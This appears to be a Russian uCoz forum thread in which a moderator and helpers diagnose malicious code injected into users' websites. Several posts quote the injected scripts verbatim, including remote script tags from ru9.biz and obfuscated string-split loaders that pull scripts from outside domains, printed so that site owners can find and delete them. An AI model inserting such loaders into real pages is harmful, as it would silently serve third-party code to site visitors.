Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 601 | 18:03:00 23 Сен 2013
    Mantikor, вы мне дали исчерпывающую информацию по заражению. а именно

    Цитата
    Эта страница содержит контент с сайта wap-tds.in, который был замечен в распространении вредоносного ПО
    моя задача была проста, а именно найти скрипт с адресом подгрузки wap-tds.in

    Цитата
    И можно ли найти ее в конкретном модуле и строке в юкоз?
    можно удалять из шаблонов, но это дольше. панель управления - дизайн - управление дизайном - выходите на список шаблонов - открываете каждый и проверяете на наличие кода
    или проще. отключаете на сайте конструктор - у вас появится ссылка на дизайн - вы сразу выходите на список шаблонов или по этой ссылке можете выйти на дизайн текущей страницы и там уже править. но для этого чуть знаний нужно
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Deagle_36
    Сообщений: 32
    Репутация: -1

    Сообщение # 602 | 08:39:11 24 Сен 2013
    На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
    Не могу найти iframe вставку что делать помогите help

    http://narutoportall.3dn.ru/ адрес сайта
    не могу зайти на сайт по скриншоту видно не знаю что делать!!
    Прикрепления: 9940328.png (229.4 Kb)
    Сообщение отредактировал Deagle_36 - Вторник, 24 Сен 2013, 08:54:47
    alex772277
    Сообщений: 1
    Репутация: 0

    Сообщение # 603 | 09:25:33 24 Сен 2013
    Люди помогите!!! В стандартном скрипте UCOZ яндекс нашел вирус и соответственно выбросили мой сайт из поисковика. И тут получается полка в двух концах - удали сам - забанят сайт, не удали - сайт останется мертвым!!! Как поступить правильно???
    Цитата
    <html>
    <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <title>$SITE_NAME$ - $MODULE_NAME$</title>
    <?$META_DESCRIPTION$?>
    <link type="text/css" rel="StyleSheet" href="/.s/src/css/805.css" />
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script></head>
    <body>
    Цитата
    
    biznesmuzhik
    Сообщений: 12
    Репутация: 1

    Сообщение # 604 | 10:00:57 24 Сен 2013
    Нужна Ваша помощь. Проверял свой сайт http://helife.ucoz.com на вирусы. Говорит, что всё в порядке. Но некоторые функции на сайте не доступны такие как отключение страницы, редактирование, удаление. Когда на водишь курсором окошко не активно. так же переход по ссылкам не производится. Не знаю в чём причина. Может кто помочь?

    Добавлено (24 Сен 2013, 10:00:57)
    ---------------------------------------------
    Всё решил проблему. Удалил <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script><script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script></head>. Возможно кому то тоже поможет.

    Всё для здоровья
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 605 | 11:59:13 24 Сен 2013
    Deagle_36, из информера последних комментариев удаляем скрипт

    Код
    <script type="text/javascript"> <!-- document.write(unescape('%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6D%75%63%6F%7A%2E%72%75%2F%22%20%74%61%72%67%65%74%3D%22%5F%62%6C% 61%6E%6B%22%3E%4D%75%63%6F%7A%2E%52%75%3C%2F%61%3E')); //--> </script>


    бесконечная глупость ставить в вид материалов эти огромнейшие конструкции, тем более с подгрузкой с чужого сайта

    Код
    <style type="text/css" media="all">  
      @import url(http://www.csomsk.ru/highslide/highslide.css);  
      </style>  
      <script type='text/javascript' src='http://www.csomsk.ru/highslide/highslide.js'></script>  
      <script type='text/javascript' src='http://www.csomsk.ru/highslide/include_highslide.js'></script>  
      <script type="text/javascript">  
      hs.graphicsDir = 'http://www.csomsk.ru/highslide/graphics/';  
      </script>


    из блока новое на сайте удаляем агрессивные рекламные вставки

    Код
    <script type="text/javascript">var s = "w.bi";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'str4.'+v+'/go.php?id=7741&m='+m+'"><'+'/scr'+'ipt>');</script>

    <script type="text/javascript">var z = Math.floor(Math.random()*25000);var i = "w.ta";var r = "il2.ru";document.write('<s'+'cr'+'ipt language="javascript" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+i+'r'+r+'/go'+'.'+'php?id=7741&z='+z+'" charset="windows-1251"><'+'/scr'+'ipt>');</script>

    <script type="text/javascript">var s = "w.bc";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'ggo.'+v+'/go.php?id=7741&m='+m+'&ref2="+escape(document.referrer)"><'+'/scr'+'ipt>');
    </script>


    далее. вы уже нашли и убрали скрипты, картинки и прочие ссылки с sinners.pp.ua?

    далее на счет проверок онлайн //forum.ucoz.ru/forum/45-47668-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 606 | 12:03:09 24 Сен 2013
    biznesmuzhik, alex772277, читаем //forum.ucoz.ru/forum/45-38778-809634-16-1328208136 к юкозовским баннерам и кодам это не имеет никакого отношения. это имеет отношение к тому, что вы где-то потеряли свои пароли

    в ваших случаях удалять строчку

    Код
    <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
    обязательно смените пароли uID профилей, которыми администрируете сайты и прочитайте инструкцию внимательно по ссылке что я дала
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Deagle_36
    Сообщений: 32
    Репутация: -1

    Сообщение # 607 | 12:56:22 24 Сен 2013
    webanet, вроде удалил все вредоносные коды спасибо)) если не сложно можете проверить и сказать все ли хорошо)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 608 | 13:07:55 24 Сен 2013
    Deagle_36, вот это осталось

    из информера последних комментариев удаляем скрипт

    Код
    <script type="text/javascript"> <!-- document.write(unescape('%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6D%75%63%6F%7A%2E%72%75%2F%22%20%74%61%72%67%65%74%3D%22%5F%62%6C%  61%6E%6B%22%3E%4D%75%63%6F%7A%2E%52%75%3C%2F%61%3E')); //--> </script>


    бесконечная глупость ставить в вид материалов эти огромнейшие конструкции, тем более с подгрузкой с чужого сайта

    Код
    <style type="text/css" media="all">   
       @import url(http://www.csomsk.ru/highslide/highslide.css);   
       </style>   
       <script type='text/javascript' src='http://www.csomsk.ru/highslide/highslide.js'></script>   
       <script type='text/javascript' src='http://www.csomsk.ru/highslide/include_highslide.js'></script>   
       <script type="text/javascript">   
       hs.graphicsDir = 'http://www.csomsk.ru/highslide/graphics/';   
       </script>


    причем первое критично
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    biznesmuzhik
    Сообщений: 12
    Репутация: 1

    Сообщение # 609 | 16:47:54 24 Сен 2013
    Цитата (webanet)
    обязательно смените пароли uID профилей, которыми администрируете сайты и прочитайте инструкцию внимательно по ссылке что я дала
    Благодарю за подсказку
    Всё для здоровья
    BUB
    Сообщений: 39
    Репутация: 6

    Сообщение # 610 | 21:59:56 24 Сен 2013
    1. http://dcc-dsc.su
    2. Chrome блокирует сайт с уведомлением об "обнаружении потенциально опасного ПО", по кнопке "Подробно" сообщается, что сайт заражен эксплоитом
    в инструментах Google для web-мастеров, этот же Google сообщает, что сайт в порядке, вредоносный код или ПО не обнаружены
    Однако изо дня в день, продолжает висеть уведомление с обновлением даты, т.е. он его видит, но в инструментах сообщает обратное, о чистом сайте, ни одной зараженной страницы

    Появилось уведомление после жалобы производителя или кого-либо из реализаторов XADO на статью о негативном влиянии присадок к маслам на технику, возможно что-то испортили, не могу найти что (статью удалил, хотя не понимаю как можно было пожаловаться на текст, если в нём нет вредоносного кода)

    Также, появлялась жалоба ранее на:
    Код
    <img alt="" style="margin:0;padding:0;border:0;" src="http://dcc-dsc.su/stat/1380011101" height="31" width="88" />

    я так понимаю, это счётчик ucoz? папки такой нет на фтп

    Из скриптов на сайте есть:
    - скрипт Google аналитики
    - скрипт Яндекс метрики
    - скрипт Яндекс. директ

    Помогите отыскать вредоносный код/ПО на сайте
    Донецк на расстоянии одного клика
    ДОНЕЦКИЙ СКУТЕР КЛУБ
    Сообщение отредактировал BUB - Вторник, 24 Сен 2013, 22:24:01
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 611 | 22:09:32 24 Сен 2013
    BUB, гугл с вас сегодня снял пометку. а так блок происходил из-за рич. медиа. или стояла реклама рич у вас или у вас была связь с сайтами по ссылкам или картинкам, на которых стоял рич и прочая агрессивная реклама. сейчас гугл косит рич
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    BUB
    Сообщений: 39
    Репутация: 6

    Сообщение # 612 | 22:25:02 24 Сен 2013
    нет, ричей не было
    гугл не снял пометку, сейчас выводит новую жалобу от 24.09
    днём ещё не выводил, сейчас появилась
    теперь жалуется на изображение счётчика ucoz

    Жалуется на файлы из папки /stat/ - которой нет в файловом менеджере
    как узнать что это за папка?



    мой домен dcc-dsc.su привязан к укозовскому donbass-scooter.clan.su



    Если на форуме пользователи размещают изображения с хостингов изображений (например радикал.ру) - Google блокирует мой сайт?
    единственное, с чем могу предположить связь по ссылкам
    Донецк на расстоянии одного клика
    ДОНЕЦКИЙ СКУТЕР КЛУБ
    Сообщение отредактировал BUB - Вторник, 24 Сен 2013, 22:31:27
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 613 | 22:49:02 24 Сен 2013
    BUB, это он так на стандартный домен гавкает. стандартный он ещё не вынул из черного списка. новый вынул
    а старый домен гугл не отпускает из-за этого сайта

    http://electronic.at.ua/ там стоит скрипт с вашего сайта

    Код
    <script type="text/javascript" src="http://donbass-scooter.clan.su/tags/swfobject.js"></script>и так далее
    как только развяжетесь любым способом с данным сайтом гугл отпустит старый домен
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    BUB
    Сообщений: 39
    Репутация: 6

    Сообщение # 614 | 00:28:34 25 Сен 2013
    swfobject.js - скрипт облака тэгов, его нет несколько дней (удалял на всякий случай), на electronic.at.ua видимо выводится как кэш, т.к. с скутер клуба его брать неоткуда.
    в скрипте вредоносного кода не было, как оказалось
    Донецк на расстоянии одного клика
    ДОНЕЦКИЙ СКУТЕР КЛУБ
    Сообщение отредактировал BUB - Среда, 25 Сен 2013, 00:30:24
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 615 | 00:32:35 25 Сен 2013
    BUB, чего нет несколько дней? скрипт рабочий http://donbass-scooter.clan.su/tags/swfobject.js и он стоит на сайте что я указала. развязывайтесь с ним. пишите одмену чтобы снял скрипт или со своей стороны удалите или переместите может он зашевелится. пока там ссылка стоит развязывать долго будет

    Цитата
    в скрипте вредоносного кода не было, как оказалось
    причем тут вредоносный код в скрипте. ваш домен стандартный под блоком. а скрипт с вашим доменом стоит на чужом сайте. это не дает развязать с блоком старый домен

    или снимайте на основном счетчик. потому что там ссылка на старый домен. хотя бы временно пока не утрясется. потому что из-за этого старого домена под блоком прикрепленный так и будет мигать в гугле то заблоченный то нет
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: